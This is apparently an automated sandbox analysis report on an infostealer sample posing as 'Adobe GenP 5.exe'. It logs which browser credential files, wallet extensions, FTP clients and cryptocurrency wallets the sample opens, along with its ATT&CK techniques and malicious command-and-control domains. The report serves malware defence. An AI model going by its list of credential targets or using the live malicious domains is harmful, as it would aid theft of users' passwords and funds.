            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
            Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 5448, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: BitLockerToGo.exe PID: 5448, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK matrix, listed by tactic (the number in parentheses is the count the report shows next to that technique):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: Windows Management Instrumentation (2); Command and Scripting Interpreter (2); PowerShell (1); Cron; Launchd
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Privilege Escalation: Process Injection (311); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script
Defense Evasion: Virtualization/Sandbox Evasion (11); Process Injection (311); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (3); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: Security Software Discovery (121); Virtualization/Sandbox Evasion (11); Process Discovery (1); File and Directory Discovery (1); System Information Discovery (22)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: Archive Collected Data (1); Data from Local System (41); Data from Network Shared Drive; Input Capture; Keylogging
Command and Control: Encrypted Channel (21); Non-Application Layer Protocol (2); Application Layer Protocol (113); Protocol Impersonation; Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact
Antivirus detection (sample):

Source | Detection | Scanner | Label
Adobe GenP 5.exe | 38% | Virustotal |
Adobe GenP 5.exe | 45% | ReversingLabs | Win32.Trojan.Generic
No Antivirus matches
Antivirus detection (URLs):

Source | Detection | Scanner | Label
https://icyidentifysu.click/ | 100% | Avira URL Cloud | malware
https://icyidentifysu.click/8Nr | 100% | Avira URL Cloud | malware
https://icyidentifysu.click/ck/8Nr | 100% | Avira URL Cloud | malware
https://icyidentifysu.click/nF | 100% | Avira URL Cloud | malware
https://icyidentifysu.click/YF | 100% | Avira URL Cloud | malware
https://icyidentifysu.click/piv | 100% | Avira URL Cloud | malware
https://icyidentifysu.click/pi | 100% | Avira URL Cloud | malware
https://icyidentifysu.click:443/api | 100% | Avira URL Cloud | malware
icyidentifysu.click | 100% | Avira URL Cloud | malware
https://icyidentifysu.click/api | 100% | Avira URL Cloud | malware
Contacted domains:

Name | IP | Active | Malicious | Antivirus Detection | Reputation
icyidentifysu.click | 104.21.29.252 | true | true | | unknown
Domains and URLs from the sample:

Name | Malicious | Antivirus Detection | Reputation
necklacebudi.lat | false | | high
https://icyidentifysu.click/api | true | Avira URL Cloud: malware | unknown
aspecteirs.lat | false | | high
energyaffai.lat | false | | high
sustainskelet.lat | false | | high
crosshuaht.lat | false | | high
rapeflowwj.lat | false | | high
grannyejh.lat | false | | high
discokeyus.lat | false | | high
icyidentifysu.click | true | Avira URL Cloud: malware | unknown
URLs found in memory and binary data:

Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | BitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | BitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | BitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/zloirock/core-js | Adobe GenP 5.exe | false | | high
https://icyidentifysu.click/ | BitLockerToGo.exe, 00000003.00000003.2609531929.00000000035D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2609625535.000000000356A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356694769.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2610591925.000000000356B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2610702949.00000000035D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2609550259.0000000003568000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2609186607.00000000035D0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://icyidentifysu.click/pi | BitLockerToGo.exe, 00000003.00000003.2609531929.00000000035D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356694769.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2610702949.00000000035D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2609186607.00000000035D0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi | BitLockerToGo.exe, 00000003.00000003.2427568126.00000000058A4000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743. | BitLockerToGo.exe, 00000003.00000003.2427568126.00000000058A4000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | BitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | BitLockerToGo.exe, 00000003.00000003.2426192936.000000000591D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | BitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://icyidentifysu.click/8Nr | BitLockerToGo.exe, 00000003.00000003.2476797050.0000000003574000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://icyidentifysu.click/piv | BitLockerToGo.exe, 00000003.00000003.2609531929.00000000035D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2609186607.00000000035D0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://ocsp.rootca1.amazontrust.com0: | BitLockerToGo.exe, 00000003.00000003.2426192936.000000000591D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | BitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta | BitLockerToGo.exe, 00000003.00000003.2427568126.00000000058A4000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | BitLockerToGo.exe, 00000003.00000003.2427246550.0000000005B33000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | BitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg | BitLockerToGo.exe, 00000003.00000003.2427568126.00000000058A4000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.micro | BitLockerToGo.exe, 00000003.00000003.2476797050.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356694769.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2517419497.0000000003574000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | BitLockerToGo.exe, 00000003.00000003.2427568126.00000000058A4000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://icyidentifysu.click/ck/8Nr | BitLockerToGo.exe, 00000003.00000003.2609625535.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2610591925.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2517419497.0000000003574000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://x1.c.lencr.org/0 | BitLockerToGo.exe, 00000003.00000003.2426192936.000000000591D000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | BitLockerToGo.exe, 00000003.00000003.2426192936.000000000591D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | BitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crt.rootca1.amazontrust.com/rootca1.cer0? | BitLockerToGo.exe, 00000003.00000003.2426192936.000000000591D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref | BitLockerToGo.exe, 00000003.00000003.2427568126.00000000058A4000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://icyidentifysu.click/nF | BitLockerToGo.exe, 00000003.00000003.2356694769.0000000003574000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477 | BitLockerToGo.exe, 00000003.00000003.2427568126.00000000058A4000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/zloirock/core-js/blob/v3.20.3/LICENSE | Adobe GenP 5.exe | false | | high
https://icyidentifysu.click:443/api | BitLockerToGo.exe, 00000003.00000003.2609625535.000000000356A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2425451359.0000000005894000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2610591925.000000000356B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2379523620.0000000005889000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2609550259.0000000003568000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://icyidentifysu.click/YF | BitLockerToGo.exe, 00000003.00000003.2356694769.0000000003574000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://support.mozilla.org/products/firefoxgro.all | BitLockerToGo.exe, 00000003.00000003.2427246550.0000000005B33000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | BitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN name | Malicious
104.21.29.252 | icyidentifysu.click | United States | 13335 | CLOUDFLARENETUS | true
                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1580154
                                                                                  Start date and time:2024-12-24 02:55:10 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 5m 5s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:5
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:Adobe GenP 5.exe
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.evad.winEXE@3/0@1/1
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 50%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 95%
                                                                                  • Number of executed functions: 31
                                                                                  • Number of non-executed functions: 89
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe
                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target Adobe GenP 5.exe, PID 6000 because there are no executed functions
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
20:56:31 | API Interceptor | 8x Sleep call for process: BitLockerToGo.exe modified
Match (IP) | Associated sample name / URL | Detection | Threat name | Context
104.21.29.252 | http://sharing.hs-sites.com/ | malicious | HTMLPhisher | sharing-exper-direct.com/
No context
Match (ASN) | Associated sample name / URL | Detection | Threat name | Context
CLOUDFLARENETUS | iviewers.dll | malicious | LummaC | 172.67.195.241
CLOUDFLARENETUS | Loader.exe | malicious | LummaC | 172.67.145.201
CLOUDFLARENETUS | Collapse.exe | malicious | LummaC | 172.67.199.72
CLOUDFLARENETUS | Setup.exe | malicious | LummaC Stealer | 104.21.48.1
CLOUDFLARENETUS | AxoPac.exe | malicious | LummaC | 172.67.184.241
CLOUDFLARENETUS | Setup.exe | malicious | LummaC | 172.67.169.205
CLOUDFLARENETUS | Setup.exe | malicious | LummaC | 188.114.96.6
CLOUDFLARENETUS | Setup.exe | malicious | LummaC | 188.114.96.6
CLOUDFLARENETUS | 'Set-up.exe | malicious | LummaC | 172.67.169.205
CLOUDFLARENETUS | setup.exe | malicious | LummaC | 172.67.191.144
Match (JA3 fingerprint) | Associated sample name / URL | Detection | Threat name | Context
